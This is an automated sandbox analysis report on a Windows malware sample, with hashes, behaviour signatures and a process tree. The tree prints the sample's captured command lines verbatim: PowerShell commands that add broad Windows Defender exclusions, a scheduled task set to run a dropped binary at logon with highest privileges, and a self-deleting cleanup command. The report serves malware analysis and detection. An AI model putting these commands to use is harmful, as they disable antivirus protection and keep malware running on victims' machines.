Analysis
max time kernel: 128s
max time network: 127s
platform: windows7_x64
resource: win7-20241010-en
resource tags: arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
submitted: 03/11/2024, 05:00
Static task: static1
Behavioral task: behavioral1
  Sample: 89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe
  Resource: win7-20241010-en
General
Target: 89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe
Size: 1.9MB
MD5: 89bf9535900487968f2c9282bc739f78
SHA1: 1640394a37b36fb937e743599932155a32a9f737
SHA256: 5f87e339571e6fad52ee59bb9f47bcea7a929187153fe73e2c6bf6f686c346be
SHA512: 48c5dfe6c34dd81a9c987030264255dccbcfc895bd5b80a2dfde94b68be0721787e2fec3ceef857f2951b4c37ac20c8b6e0a92bc57aaf8ee550be3ceaf662472
SSDEEP: 49152:J4fnmf79D0vIST10ybAe/BSWpU1cQX0uDHD8bPiz8Em:JamfOR82pnC9ffY5
Malware Config
Signatures
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Runs PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid  Process
2812 powershell.exe
2604 powershell.exe
2952 powershell.exe
936  powershell.exe
2440 powershell.exe
872  powershell.exe
2300 powershell.exe
3040 powershell.exe
2256 powershell.exe
1056 powershell.exe
Executes dropped EXE 5 IoCs
pid  Process
2324 mbuilder.exe
1508 svchost32.exe
2508 mbuilder.exe
1284 svchost32.exe
1740 sihost32.exe
Loads dropped DLL 4 IoCs
pid  Process
1460 cmd.exe
1508 svchost32.exe
2428 cmd.exe
1284 svchost32.exe
Drops file in System32 directory 7 IoCs
description | ioc | Process
File created | C:\Windows\system32\mbuilder.exe | svchost32.exe
File opened for modification | C:\Windows\system32\mbuilder.exe | svchost32.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File created | C:\Windows\system32\Microsoft\Telemetry\sihost32.exe | svchost32.exe
Drops file in Windows directory 1 IoCs
description | ioc | Process
File created | C:\Windows\mbuilder.exe | 89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid  Process
1924 schtasks.exe
1976 schtasks.exe
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid  Process
2300 powershell.exe
2812 powershell.exe
3040 powershell.exe
2604 powershell.exe
2256 powershell.exe
2952 powershell.exe
1508 svchost32.exe
1056 powershell.exe
936  powershell.exe
2440 powershell.exe
872  powershell.exe
1284 svchost32.exe
Suspicious use of AdjustPrivilegeToken 12 IoCs
description | pid | Process
Token: SeDebugPrivilege | 2300 | powershell.exe
Token: SeDebugPrivilege | 2812 | powershell.exe
Token: SeDebugPrivilege | 3040 | powershell.exe
Token: SeDebugPrivilege | 2604 | powershell.exe
Token: SeDebugPrivilege | 2256 | powershell.exe
Token: SeDebugPrivilege | 2952 | powershell.exe
Token: SeDebugPrivilege | 1508 | svchost32.exe
Token: SeDebugPrivilege | 1056 | powershell.exe
Token: SeDebugPrivilege | 936 | powershell.exe
Token: SeDebugPrivilege | 2440 | powershell.exe
Token: SeDebugPrivilege | 872 | powershell.exe
Token: SeDebugPrivilege | 1284 | svchost32.exe
Suspicious use of WriteProcessMemory 64 IoCs
Each row is one source PID writing into one target PID (procid_target is the sandbox's process index); identical repeated rows in the original table are collapsed here with their call count.
pid  Process -> target pid | procid_target | calls
2024 89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe -> 1968 | 31 | 4
2024 89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe -> 1724 | 33 | 4
1724 cmd.exe -> 2324 | 36 | 4
1968 cmd.exe -> 2300 | 35 | 4
2324 mbuilder.exe -> 2740 | 37 | 3
2740 cmd.exe -> 2812 | 39 | 3
2740 cmd.exe -> 3040 | 40 | 3
2740 cmd.exe -> 2604 | 41 | 3
1968 cmd.exe -> 2256 | 42 | 4
2740 cmd.exe -> 2952 | 43 | 3
2324 mbuilder.exe -> 1460 | 44 | 3
1460 cmd.exe -> 1508 | 46 | 3
1508 svchost32.exe -> 2064 | 47 | 3
2064 cmd.exe -> 1924 | 49 | 3
1508 svchost32.exe -> 2508 | 50 | 3
1508 svchost32.exe -> 1652 | 51 | 3
2508 mbuilder.exe -> 2000 | 52 | 3
2000 cmd.exe -> 1056 | 55 | 3
1652 cmd.exe -> 2204 | 56 | 3
2000 cmd.exe -> 936 | 57 | 2
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
Process tree: the bracketed number is the nesting depth reported by the sandbox, indentation shows parent/child relationships, "cmd:" is the captured command line.

[1] C:\Users\Admin\AppData\Local\Temp\89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe"
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2024
  [2] C:\Windows\SysWOW64\cmd.exe
      cmd: cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      PID:1968
    [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        cmd: powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        - Command and Scripting Interpreter: PowerShell
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID:2300
    [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        cmd: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        - Command and Scripting Interpreter: PowerShell
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID:2256
  [2] C:\Windows\SysWOW64\cmd.exe
      cmd: cmd /c start C:\Windows\mbuilder.exe
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      PID:1724
    [3] C:\Windows\mbuilder.exe
        cmd: C:\Windows\mbuilder.exe
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory
        PID:2324
      [4] C:\Windows\system32\cmd.exe
          cmd: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
          - Suspicious use of WriteProcessMemory
          PID:2740
        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmd: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID:2812
        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmd: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID:3040
        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmd: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID:2604
        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmd: powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID:2952
      [4] C:\Windows\System32\cmd.exe
          cmd: "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\mbuilder.exe"
          - Loads dropped DLL
          - Suspicious use of WriteProcessMemory
          PID:1460
        [5] C:\Users\Admin\AppData\Local\Temp\svchost32.exe
            cmd: C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\mbuilder.exe"
            - Executes dropped EXE
            - Loads dropped DLL
            - Drops file in System32 directory
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
            PID:1508
          [6] C:\Windows\System32\cmd.exe
              cmd: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "mbuilder" /tr '"C:\Windows\system32\mbuilder.exe"' & exit
              - Suspicious use of WriteProcessMemory
              PID:2064
            [7] C:\Windows\system32\schtasks.exe
                cmd: schtasks /create /f /sc onlogon /rl highest /tn "mbuilder" /tr '"C:\Windows\system32\mbuilder.exe"'
                - Scheduled Task/Job: Scheduled Task
                PID:1924
          [6] C:\Windows\system32\mbuilder.exe
              cmd: "C:\Windows\system32\mbuilder.exe"
              - Executes dropped EXE
              - Suspicious use of WriteProcessMemory
              PID:2508
            [7] C:\Windows\system32\cmd.exe
                cmd: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                - Suspicious use of WriteProcessMemory
                PID:2000
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  cmd: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                  - Command and Scripting Interpreter: PowerShell
                  - Drops file in System32 directory
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
                  PID:1056
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  cmd: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                  - Command and Scripting Interpreter: PowerShell
                  - Drops file in System32 directory
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
                  PID:936
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  cmd: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                  - Command and Scripting Interpreter: PowerShell
                  - Drops file in System32 directory
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
                  PID:2440
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  cmd: powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                  - Command and Scripting Interpreter: PowerShell
                  - Drops file in System32 directory
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
                  PID:872
            [7] C:\Windows\System32\cmd.exe
                cmd: "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\mbuilder.exe"
                - Loads dropped DLL
                PID:2428
              [8] C:\Users\Admin\AppData\Local\Temp\svchost32.exe
                  cmd: C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\mbuilder.exe"
                  - Executes dropped EXE
                  - Loads dropped DLL
                  - Drops file in System32 directory
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
                  PID:1284
                [9] C:\Windows\System32\cmd.exe
                    cmd: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "mbuilder" /tr '"C:\Windows\system32\mbuilder.exe"' & exit
                    PID:2088
                  [10] C:\Windows\system32\schtasks.exe
                      cmd: schtasks /create /f /sc onlogon /rl highest /tn "mbuilder" /tr '"C:\Windows\system32\mbuilder.exe"'
                      - Scheduled Task/Job: Scheduled Task
                      PID:1976
                [9] C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
                    cmd: "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
                    - Executes dropped EXE
                    PID:1740
                [9] C:\Windows\System32\cmd.exe
                    cmd: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
                    PID:2800
                  [10] C:\Windows\system32\choice.exe
                      cmd: choice /C Y /N /D Y /T 3
                      PID:3036
          [6] C:\Windows\System32\cmd.exe
              cmd: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
              - Suspicious use of WriteProcessMemory
              PID:1652
            [7] C:\Windows\system32\choice.exe
                cmd: choice /C Y /N /D Y /T 3
                PID:2204
Network
MITRE ATT&CK Enterprise v15
Downloads
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4FIMNYIQ5MCYM0VI3FL6.temp
  Filesize: 7KB
  MD5: f8356ac9a42cb4d9953ab60a51da8067
  SHA1: 7cf5b6912b66d1bdbfb1f1f0e2c3c17b7820b337
  SHA256: 2e85095b15e6f9876c5ef74bb9581df7ff372fb671ff4fa219a2bbc25fdf7ef0
  SHA512: abd88d00b9b5c749bbeed0cd8e6e4900d73dcd42a5a133e6bf12fd856f68de7d53446be57ec82b5249b51d55b2dc3ec4b04cd1d3e08b9bdb77b278be005241a6
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 2ecd7461cdcd8f331d90b44e9854faf2
  SHA1: d714f3038e051503c9ad6915cc28c2304617dda8
  SHA256: 63ff90cbf00b00721be8bc808c796de2635d90f391ddf5882ee68eecc52eac6f
  SHA512: dc3de7568b7a484141254745b5dc63b2d6207f1a1e8c3d7a1a100b462f83f1dd0a9f83d4686797ac8e4ca0f29aa210db697af8cd4e264ffc9e3d16ae15d24ae8
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  Filesize: 7KB
  MD5: f2d36cd608bb92d0096c59ee8ce8345e
  SHA1: f0f0a158c540718f74791512b565287968a61f6a
  SHA256: db51255e061e2e55ad9b57a88a88a61a1bfa6bfb3a8796f51b48e5c35a5175fb
  SHA512: 84de23a4085125d00493cfbb0d94d4e2ce0153049c7bf0176bcc69f7fe4becb834c7d75e1c997a5690a3ca2a99c82c5607168095773ff557d82fbbad65f7ac21